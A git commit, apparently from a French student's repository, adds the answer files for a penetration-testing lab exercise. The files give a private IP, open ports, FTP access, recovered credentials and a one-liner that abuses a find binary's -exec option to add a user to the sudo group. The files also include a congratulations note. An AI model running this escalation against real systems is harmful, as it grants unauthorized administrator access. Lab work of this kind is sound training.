Final modif
This commit is contained in:
parent
2777d93573
commit
7ff7a808dc
4 changed files with 31 additions and 0 deletions
3
Felicitation.txt
Normal file
3
Felicitation.txt
Normal file
|
|
@ -0,0 +1,3 @@
|
|||
Bravo à tous pour avoir terminé le TP !
|
||||
|
||||
Continuez comme ça !
|
||||
26
answers.txt
Normal file
26
answers.txt
Normal file
|
|
@ -0,0 +1,26 @@
|
|||
1.
|
||||
|
||||
ip: 192.168.56.55
|
||||
port: 22 et 21
|
||||
|
||||
2.
|
||||
|
||||
connexion ftp
|
||||
|
||||
3.
|
||||
|
||||
mdp: yzhxvq
|
||||
cle: IJDK
|
||||
|
||||
devien: python
|
||||
|
||||
user: deby
|
||||
mdp: python
|
||||
|
||||
4.
|
||||
|
||||
./find . -exec /usr/sbin/usermod -aG sudo deby \; -quit
|
||||
|
||||
5.
|
||||
|
||||
reussi !!!
|
||||
1
np/commandeBash.txt
Normal file
1
np/commandeBash.txt
Normal file
|
|
@ -0,0 +1 @@
|
|||
./find . -exec /usr/sbin/usermod -aG sudo deby \; -quit
|
||||
1
np/commandeFTP.txt
Normal file
1
np/commandeFTP.txt
Normal file
|
|
@ -0,0 +1 @@
|
|||
ftp 192.168.56.55
|
||||
Loading…
Add table
Reference in a new issue